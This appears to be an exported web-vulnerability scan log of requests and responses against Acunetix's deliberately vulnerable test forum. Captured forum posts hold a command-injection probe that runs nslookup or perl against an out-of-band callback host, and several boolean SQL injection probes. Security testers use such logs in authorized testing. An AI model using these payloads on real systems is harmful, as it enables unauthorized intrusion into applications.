<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>&(nslookup hitgvavrmebey35980.bxss.me||perl -e "gethostbyname('hitgvavrmebey35980.bxss.me')")&'\"`0&(nslookup hitgvavrmebey35980.bxss.me||perl -e "gethostbyname('hitgvavrmebey35980.bxss.me')")&`'</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=60 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=60 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=60 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:55 GMT Content-Length: 3055 |
Response Body - size: 3,055 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 1 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D60" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D60" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/1 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:15:42 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>1 - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=61 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=61 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=61 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:56 GMT Content-Length: 3073 |
Response Body - size: 3,073 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum @@NiQ6e </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D61" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D61" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/@@NiQ6e </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:15:43 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>@@NiQ6e - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=62 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=62 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=62 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:56 GMT Content-Length: 3061 |
Response Body - size: 3,061 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D62" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D62" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:15:49 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=63 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=63 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=63 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:56 GMT Content-Length: 3061 |
Response Body - size: 3,061 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D63" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D63" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:15 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=64 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=64 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=64 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:56 GMT Content-Length: 3087 |
Response Body - size: 3,087 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D64" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D64" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:15 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1 OR 2+998-998-1=0+0+0+1 -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=65 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=65 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=65 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:56 GMT Content-Length: 3087 |
Response Body - size: 3,087 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D65" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D65" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:16 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1 OR 3+998-998-1=0+0+0+1 -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=66 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=66 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=66 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:56 GMT Content-Length: 3085 |
Response Body - size: 3,085 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D66" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D66" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:17 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1 OR 3*2<(0+5+998-998) -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=67 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=67 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=67 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:56 GMT Content-Length: 3085 |
Response Body - size: 3,085 bytes. |
